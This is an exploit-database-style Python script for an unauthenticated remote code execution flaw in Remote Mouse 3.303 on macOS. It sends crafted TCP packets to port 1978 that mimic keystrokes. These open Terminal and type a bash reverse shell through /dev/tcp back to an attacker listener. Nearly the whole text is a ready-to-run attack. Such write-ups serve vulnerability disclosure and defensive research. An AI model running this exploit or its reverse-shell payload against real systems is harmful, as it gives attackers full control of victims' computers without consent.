# Exploit Title: Remote Mouse 3.303 - Remote Code Execution (MacOS) # Date: 21/07/2025 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.remotemouse.net # Software Link: https://itunes.apple.com/app/remote-mouse/id403195710?mt=12 # Version: 3.303 (MacOS) # Tested on: macOS Mojave 10.14.6 ''' Description: Remote Mouse 3.303 (macOS) contains an unauthenticated remote code execution vulnerability. By sending crafted TCP packets that simulate keyboard input, an attacker can remotely open a terminal and execute arbitrary commands, enabling full system compromise. ''' import socket import time IP, PORT = "192.168.8.105", 1978 LHOST, LPORT = "192.168.8.102", "4444" def send_tcp(cmd): try: with socket.socket() as s: s.connect((IP, PORT)) msg = f"key{len(cmd):3d}{cmd}".encode() s.sendall(msg) time.sleep(0.1) except Exception as e: print(f"Error: {e}") print("[+] Starting attack sequence") print(f"Target: {IP}:{PORT}, Listener: {LHOST}:{LPORT}\n") send_tcp("cmd[+] ") time.sleep(2) print("Opening terminal") send_tcp("[noe]terminal") time.sleep(1) send_tcp("[kld]return") time.sleep(0.01) send_tcp("[klu]return") time.sleep(2) print("Delivering payload") payload = f"[noe]bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1" send_tcp(payload) time.sleep(0.1) print("Executing payload") send_tcp("[kld]return") time.sleep(0.01) send_tcp("[klu]return") print("\n[+] Attack sequence completed - Check listener")